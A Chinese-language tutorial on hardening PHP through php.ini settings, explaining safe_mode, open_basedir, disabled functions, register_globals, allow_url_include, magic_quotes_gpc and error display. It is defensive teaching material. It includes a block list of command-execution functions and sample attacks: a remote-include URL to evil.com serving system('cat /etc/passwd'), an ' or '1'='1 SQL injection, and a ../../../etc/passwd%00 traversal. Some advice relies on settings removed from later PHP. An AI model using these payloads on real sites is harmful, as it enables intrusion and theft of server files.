PHP安全相关的配置

php.ini 安全配置

(1) 打开php的安全模式

php的安全模式是个非常重要的内嵌的安全机制，能够控制一些php中的函数，比如system()，同时把很多文件操作函数进行了权限控制，也不允许对某些关键文件的文件，比如/etc/passwd，但是默认的php.ini是没有打开安全模式的，我们把它打开：

safe_mode = on

(2) 用户组安全

当safe_mode打开时，safe_mode_gid被关闭，那么php脚本能够对文件进行访问，而且相同组的用户也能够对文件进行访问。建议设置为：

safe_mode_gid = off

如果不进行设置，可能我们无法对我们服务器网站目录下的文件进行操作了，比如我们需要对文件进行操作的时候。

(3) 安全模式下执行程序主目录

如果安全模式打开了，但是却是要执行某些程序的时候，可以指定要执行程序的主目录：

safe_mode_exec_dir = D:/usr/bin

一般情况下是不需要执行什么程序的，所以推荐不要执行系统程序目录，可以指向一个目录，　

然后把需要执行的程序拷贝过去，比如：

safe_mode_exec_dir = D:/tmp/cmd

但是，我更推荐不要执行任何程序，那么就可以指向我们网页目录：

safe_mode_exec_dir = D:/usr/www

(4) 安全模式下包含文件

如果要在安全模式下包含某些公共文件，那么就修改一下选项：

safe_mode_include_dir = D:/usr/www/include/

其实一般php脚本中包含文件都是在程序自己已经写好了，这个可以根据具体需要设置。

(5) 控制php脚本能访问的目录

使用open_basedir选项能够控制PHP脚本只能访问指定的目录，这样能够避免PHP脚本访问不应该访问的文件，一定程度上限制了phpshell的危害，我们一般可以设置为只能访问网站目录：

open_basedir = D:/usr/www

(6) 关闭危险函数

如果打开了安全模式，那么函数禁止是可以不需要的，但是我们为了安全还是考虑进去。比如，我们觉得不希望执行包括system()等在那的能够执行命令的php函数，或者能够查看php信息的phpinfo()等函数，那么我们就可以禁止它们：

disable_functions = system,passthru,exec,shell_exec,popen,phpinfo,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,show_source,get_cfg_var

如果你要禁止任何文件和目录的操作，那么可以关闭很多文件操作：

disable_functions = chdir,chroot,dir,getcwd,opendir,readdir,scandir,fopen,unlink,delete,copy,mkdir,rmdir,rename,file,file_get_contents,fputs,fwrite,chgrp,chmod,chown

以上只是列了部分不叫常用的文件处理函数，你也可以把上面执行命令函数和这个函数结合，就能够抵制大部分的phpshell了。

(7) 关闭PHP版本信息在http头中的泄漏

我们为了防止黑客获取服务器中php版本的信息，可以关闭该信息斜路在http头中：

expose_php = Off

比如黑客在 telnet www.12345.com 80 的时候，那么将无法看到PHP的信息。

(8) 关闭注册全局变量

在PHP中提交的变量，包括使用POST或者GET提交的变量，都将自动注册为全局变量，能够直接访问，这是对服务器非常不安全的，所以我们不能让它注册为全局变量，就把注册全局变量选项关闭：　

register_globals = Off

当然，如果这样设置了，那么获取对应变量的时候就要采用合理方式，比如获取GET提交的变量var，那么就要用$_GET['var']来进行获取，这个php程序员要注意。

(9) 打开magic_quotes_gpc来防止SQL注入

SQL注入是非常危险的问题，小则网站后台被入侵，重则整个服务器沦陷，

所以一定要小心。php.ini中有一个设置：

magic_quotes_gpc = Off

这个默认是关闭的，如果它打开后将自动把用户提交对sql的查询进行转换，比如把 ' 转为 \'等，这对防止sql注射有重大作用。所以我们推荐设置为：　　

magic_quotes_gpc = On

(10) 错误信息控制

一般php在没有连接到数据库或者其他情况下会有提示错误，一般错误信息中会包含php脚本当前的路径信息或者查询的SQL语句等信息，这类信息提供给黑客后，是不安全的，所以一般服务器建议禁止错误提示：

display_errors = Off

如果你却是是要显示错误信息，一定要设置显示错误的级别，比如只显示警告以上的信息：

error_reporting = E_WARNING & E_ERROR

当然，我还是建议关闭错误提示。

(11) 错误日志

建议在关闭display_errors后能够把错误信息记录下来，便于查找服务器运行的原因：

log_errors = On

同时也要设置错误日志存放的目录，建议根apache的日志存在一起：

error_log = D:/usr/local/apache2/logs/php_error.log

注意：给文件必须允许apache用户的和组具有写的权限。

 

1、register_globals = Off

PHP在进程启动时，会根据register_globals的设置，判断是否将$_GET、$_POST、$_COOKIE、$_ENV、$_SERVER、$REQUEST等数组变量里的内容自动注册为全局变量。

我们举个例子来说明register_globals = On时，会引发的安全问题：

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

<?php if (authenticated_user()) {     $authorized = true; } ?> // 由于authorized 未被初始化，故而可能通过register_globals被定义 // 如 GET example.php?authorized=1 <?php if (!$authorized) {     // 一些重要的操作，比如SetCookies     include("SetCookies.php"); } ?>

对于上述代码，由于PHP会自动的为每个提交的值创建一个变量，这样只要在请求中提交http://example.com/example.php?authorized=1,即可获得授权操作，为了避免出现这样的问题，建议将register_globals配置为Off。

 

2、allow_url_include =Off

PHP通过此选项控制是否允许通过include/require来执行一个远程文件（如http://evil.com/evil.php或ftp://evil.com/evil.php）。

代码示例如下：

1 2 3 4 5 6 7 8 9 10 11

// http://HostA/test.php如下： <?php $strParam = $_GET['param']; if (!include_once($strParam . '.php')){     echo "error"; } ?> // http://evil.com/evil.php示例如下： <?php echo "<?php system('cat/etc/passwd'); ?>" ?>

假如用户访问如下的URL，访问页面中的$strParam将被设置为一个远程的URL：http://evil.com/evil.php。如果此配置被设置为on，那么test.php会通过include_once执行远程服务器上的PHP文件（http://evil.com/evil.php），后果不言而喻。

1	http://HostA/test.php?param=http://evil.com/evil

所以建议此选项强制配置为Off。

当然要彻底解决上述代码的安全漏洞，除了规范PHP配置，还需要规范PHP编码。

 

3、magic_quotes_gpc = on

举一个典型的SQL注入示例，假如SQL语句用如下方式拼接：

1	select * from user where pass=' ". $_GET['passwd']. "' and user='" . $_GET['username'] ."';

假如用户提交一个login.php?passwd=p&username=' or '1'='1请求，代码中的SQL语句将变成：

这就造成一个SQL注入漏洞。避免此问题出现的正确思路是开发者在拼接SQL语句之前过滤所有接收的数值，并严格执行这种编码规范，但是并不是所有的开发者都会意识到这种问题的存在，而此时，如果将php.ini的magic_quotes_gpc设置为On时，PHP将对所有GPC参数($_GET,$_POST,$_COOKIE)进行addslashes处理[既转义单引号、双引号、反斜线和nullbyte]，该SQL语句将是：

由于'已经被转义，SQL语句不能被成功执行，从而防止SQL注射。

另外，以小节2中的http://HostA/test.php为例，当magic_quotes_gpc= Off的情况下，用户提交一个example.php?param=../../../etc/passwd%00请求，由于代码中限制的文件后缀（.php）将被%00截断，就会通过require_once尝试读取/etc/passwd文件。

值得注意的是，magic_quotes_gpc配置为On时，有以下缺点：

1、PHP此时会对所有GPC参数做addslashes处理，会有比较大的性能损耗。

2、当GPC参数被用于其他操作如逻辑关系判断之前就必须先做strislashes处理，否则结果必然是不正确的。

考虑到开启此选项带来的性能损耗和代码的复杂化，可以在使用时灵活设置，对于一些不规范或者无人维护的代码，可以开启此选项；更好的做法是将此值设置为Off，由开发者严格过滤来自用户的输入。

 

4、expose_php = Off

我们经常会在一个http头里发现这样的信息：

X-Powered-By:PHP/5.2.11

PHP的版本号暴露无疑，攻击者很容易捕获到此信息，要想解决此问题我们只要如下配置：

1	expose_php = Off

 

5、display_errors = Off

此控制项控制PHP是否将error、notice、warning日志打印出来，以及打印的位置。错误信息主要用于辅助开发，但是在线上环境却非常危险，因为这样将会把服务端的WebServer、数据库、PHP代码部署路径，甚至是数据库连接、数据表等关键信息暴露出去，为攻击者带来极大便利。所以建议产品上线时修改为Off。

 

6、error_reporting = E_ALL& ~E_NOTICE

此配置项控制PHP打印哪些错误日志（errors，warnings，notices）。默认情况下会打印所有的错误日志，线上环境我们应该不显示具体的E_NOTICE日志信息。导致E_NOTICE错误的最普遍场景是——使用未经初始化的变量，以下述代码为例：

1 2 3 4 5 6 7 8 9

<?php // 假如用户请求中无username 参数，则会打印notice错误 $username = $_GET['username'];     // 引用一个未初始化的变量var2 // 则会打印notice错误 $var1 = $var2; ?>

如果用户访问的url中没有指定username参数，则代码中$_GET['username']就是一个未经初始化的变量，直接访问就会抛出一个NOTICE错误。上述代码执行会报如下错误，这样即泄漏了代码目录。

PHP Notice: Undefined index: username in /somepath/test.php on line 3
PHP Notice: Undefined variable: var2 in /somepath/test.php on line 6

攻击者会利用这些信息，猜测代码逻辑，使得攻击变得更方便。

 

7、display_startup_errors =Off 

PHP启动时产生的错误由此选项进行控制，这个和display_errors是分开的。为了避免PHP进程启动时产生的错误被打印到页面上而造成信息泄漏，此选项在线上服务也应该被配置为Off。为了方便开发和调试，开发环境可以将其设置为On。

由此我们可以看出，正确的PHP基础安全配置可有效避免很多高危漏洞，避免泄漏服务器敏感信息，从而提升产品的安全性。